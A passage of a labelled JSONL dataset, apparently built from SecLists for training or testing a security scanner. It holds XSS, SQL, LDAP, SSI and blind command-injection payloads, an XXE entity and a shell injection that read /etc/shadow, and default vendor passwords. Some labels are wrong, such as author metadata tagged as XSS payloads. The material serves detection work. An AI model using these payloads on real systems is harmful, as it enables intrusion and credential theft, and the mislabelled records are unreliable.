"seclists_01046", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><source onbeforepaste=\"alert(1)\" contenteditable>test</source></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<source onbeforepaste=\"alert(1)\" contenteditable>test</source>", "injection_type": "XSS"}}]} {"id": "seclists_01047", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%28 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%28", "injection_type": "cmd"}}]} {"id": "seclists_01048", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><hr onmousemove=\"alert(1)\">test</hr></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<hr onmousemove=\"alert(1)\">test</hr>", "injection_type": "XSS"}}]} {"id": "seclists_01049", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\\\&apos;/bin/cat%20/etc/shadow\\\\&apos;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\\&apos;/bin/cat%20/etc/shadow\\\\&apos;", "injection_type": "cmd"}}]} {"id": "seclists_01050", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><big onbeforecopy=\"alert(1)\" contenteditable>test</big></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<big onbeforecopy=\"alert(1)\" contenteditable>test</big>", "injection_type": "XSS"}}]} {"id": "seclists_01051", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", "injection_type": "XXE"}}]} {"id": "seclists_01052", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Polycom,<BLANK>,x6zynd56,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Polycom,<BLANK>,x6zynd56,"}}]} {"id": "seclists_01053", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01054", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<svg><picture onload=alert(1)></picture> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><picture onload=alert(1)></picture>", "injection_type": "XSS"}}]} {"id": "seclists_01055", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<slot draggable=\"true\" ondragend=\"alert(1)\">test</slot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<slot draggable=\"true\" ondragend=\"alert(1)\">test</slot>", "injection_type": "XSS"}}]} {"id": "seclists_01056", "source": "seclists", "source_license": "MIT", "text": "username=//*&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//*", "injection_type": "SQL"}}]} {"id": "seclists_01057", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#config timefmt=\"A %B %d %Y %r\"-->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#config timefmt=\"A %B %d %Y %r\"-->", "injection_type": "SSI"}}]} {"id": "seclists_01058", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title>", "injection_type": "XSS"}}]} {"id": "seclists_01059", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\") or (\"1\"=\"1\"/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or (\"1\"=\"1\"/*", "injection_type": "SQL"}}]} {"id": "seclists_01060", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '.print(`echo%20VWGDMS`.`echo%20$((77%2B11))`.`echo%20VWGDMS`.`echo%20VWGDMS`)%3B%23VWGDMS", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'.print(`echo%20VWGDMS`.`echo%20$((77%2B11))`.`echo%20VWGDMS`.`echo%20VWGDMS`)%3B%23VWGDMS", "injection_type": "cmd"}}]} {"id": "seclists_01061", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1 in (select @@version)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1 in (select @@version)--", "injection_type": "SQL"}}]} {"id": "seclists_01062", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01063", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:IBM,<BLANK>,sertafu,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,<BLANK>,sertafu,"}}]} {"id": "seclists_01064", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: SIrDarckCat</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: SIrDarckCat", "injection_type": "XSS"}}]} {"id": "seclists_01065", "source": "seclists", "source_license": "MIT", "text": "password: Oracle,demo,demo,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,demo,demo,"}}]} {"id": "seclists_01066", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><rtc onmouseleave=\"alert(1)\">test</rtc></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rtc onmouseleave=\"alert(1)\">test</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_01067", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&LT; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&LT;", "injection_type": "cmd"}}]} {"id": "seclists_01068", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01069", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><rp onkeyup=\"alert(1)\" contenteditable>test</rp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp onkeyup=\"alert(1)\" contenteditable>test</rp>", "injection_type": "XSS"}}]} {"id": "seclists_01070", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or username like char(37);';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or username like char(37);", "injection_type": "SQL"}}]} {"id": "seclists_01071", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01072", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%207%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%207%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_01073", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:sixsix", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sixsix"}}]} {"id": "seclists_01074", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%7C%20%5B%203%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%203%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01075", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=-2 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-2", "injection_type": "cmd"}}]} {"id": "seclists_01076", "source": "seclists", "source_license": "MIT", "text": "filename=^'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "^'", "injection_type": "cmd"}}]} {"id": "seclists_01077", "source": "seclists", "source_license": "MIT", "text": "filename=& ping -n 30 127.0.0.1 &", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "& ping -n 30 127.0.0.1 &", "injection_type": "cmd"}}]} {"id": "seclists_01078", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=sexsexsex\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sexsexsex"}}]} {"id": "seclists_01079", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: STYLE HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: STYLE", "injection_type": "XSS"}}]} {"id": "seclists_01080", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<title onbeforecopy=\"alert(1)\" contenteditable>test</title>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<title onbeforecopy=\"alert(1)\" contenteditable>test</title>", "injection_type": "XSS"}}]} {"id": "seclists_01081", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7Cecho$IFSAQWEET$((38%2B66))$(echo$IFSAQWEET)AQWEET\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSAQWEET$((38%2B66))$(echo$IFSAQWEET)AQWEET\\", "injection_type": "cmd"}}]} {"id": "seclists_01082", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=3COM,root,!root,http://support.3com.com/infodeli/tools/remote/ocradsl/20/812_cli20.pdfhttp://support.3com.com/infodeli/tools/remote/ocremote/brouters/840/2sysadmin.htm\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "3COM,root,!root,http://support.3com.com/infodeli/tools/remote/ocradsl/20/812_cli20.pdfhttp://support.3com.com/infodeli/tools/remote/ocremote/brouters/840/2sysadmin.htm"}}]} {"id": "seclists_01083", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">%3c%69%6d%67%2f%73%72%63%3d%31</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3c%69%6d%67%2f%73%72%63%3d%31", "injection_type": "XSS"}}]} {"id": "seclists_01084", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><nextid draggable=\"true\" ondrag=\"alert(1)\">test</nextid></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<nextid draggable=\"true\" ondrag=\"alert(1)\">test</nextid>", "injection_type": "XSS"}}]} {"id": "seclists_01085", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rb draggable=\"true\" ondragstart=\"alert(1)\">test</rb>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rb draggable=\"true\" ondragstart=\"alert(1)\">test</rb>", "injection_type": "XSS"}}]} {"id": "seclists_01086", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|nid\\n HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|nid\\n", "injection_type": "cmd"}}]} {"id": "seclists_01087", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Bausch Datacom,admin,epicrouter,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Bausch Datacom,admin,epicrouter,"}}]} {"id": "seclists_01088", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=babyboy\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "babyboy"}}]} {"id": "seclists_01089", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=\"onmouseover=alert(1)// HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"onmouseover=alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_01090", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<noscript draggable=\"true\" ondragend=\"alert(1)\">test</noscript>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noscript draggable=\"true\" ondragend=\"alert(1)\">test</noscript>", "injection_type": "XSS"}}]} {"id": "seclists_01091", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <script>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <script>", "injection_type": "XSS"}}]} {"id": "seclists_01092", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=someone\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "someone"}}]} {"id": "seclists_01093", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01094", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><link onbeforecopy=\"alert(1)\" contenteditable>test</link></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<link onbeforecopy=\"alert(1)\" contenteditable>test</link>", "injection_type": "XSS"}}]} {"id": "seclists_01095", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=melvin\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "melvin"}}]} {"id": "seclists_01096", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=IBM,ibm,password,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,ibm,password,"}}]} {"id": "seclists_01097", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=( HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(", "injection_type": "LDAP"}}]} {"id": "seclists_01098", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or 2 > 1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 2 > 1", "injection_type": "SQL"}}]} {"id": "seclists_01099", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Concatenates obfuscated eval() and substr() to be called on location.hash</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Concatenates obfuscated eval() and substr() to be called on location.hash", "injection_type": "XSS"}}]} {"id": "seclists_01100", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><svg><script xlink:href=data:,alert(1) /></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><script xlink:href=data:,alert(1) />", "injection_type": "XSS"}}]} {"id": "seclists_01101", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<ruby oncut=\"alert(1)\" contenteditable>test</ruby>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ruby oncut=\"alert(1)\" contenteditable>test</ruby>", "injection_type": "XSS"}}]} {"id": "seclists_01102", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: a=1;a=eval;b=alert;a(b(11));//\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: a=1;a=eval;b=alert;a(b(11));//", "injection_type": "XSS"}}]} {"id": "seclists_01103", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];", "injection_type": "XSS"}}]} {"id": "seclists_01104", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_01105", "source": "seclists", "source_license": "MIT", "text": "username=%20'sleep%2050'&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20'sleep%2050'", "injection_type": "SQL"}}]} {"id": "seclists_01106", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\\\/", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\\/", "injection_type": "cmd"}}]} {"id": "seclists_01107", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: This vector breaks double quoted URL input</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector breaks double quoted URL input", "injection_type": "XSS"}}]} {"id": "seclists_01108", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_01109", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", "injection_type": "cmd"}}]} {"id": "seclists_01110", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01111", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG%20SRC='javascript:alert(document.cookie)'>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG%20SRC='javascript:alert(document.cookie)'>", "injection_type": "cmd"}}]} {"id": "seclists_01112", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: IMG Dynsrc HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IMG Dynsrc", "injection_type": "XSS"}}]} {"id": "seclists_01113", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2A%28%7C%28mail%3D%2A%29%29", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28mail%3D%2A%29%29", "injection_type": "cmd"}}]} {"id": "seclists_01114", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Avaya,diag,danger,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Avaya,diag,danger,"}}]} {"id": "seclists_01115", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01116", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"last_modified\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"last_modified\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01117", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><body onmouseover=\"alert(1)\">test</body></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onmouseover=\"alert(1)\">test</body>", "injection_type": "XSS"}}]} {"id": "seclists_01118", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='';!--\"<XSS>=&{()} HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'';!--\"<XSS>=&{()}", "injection_type": "cmd"}}]} {"id": "seclists_01119", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><noscript oncut=\"alert(1)\" contenteditable>test</noscript></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noscript oncut=\"alert(1)\" contenteditable>test</noscript>", "injection_type": "XSS"}}]} {"id": "seclists_01120", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '%20or%20''='';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20or%20''='", "injection_type": "SQL"}}]} {"id": "seclists_01121", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \" \"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" \"", "injection_type": "SQL"}}]} {"id": "seclists_01122", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: a);id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);id;", "injection_type": "cmd"}}]} {"id": "seclists_01123", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%7C%20%5B%201%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%201%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01124", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01125", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: PHPIDS Group\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": 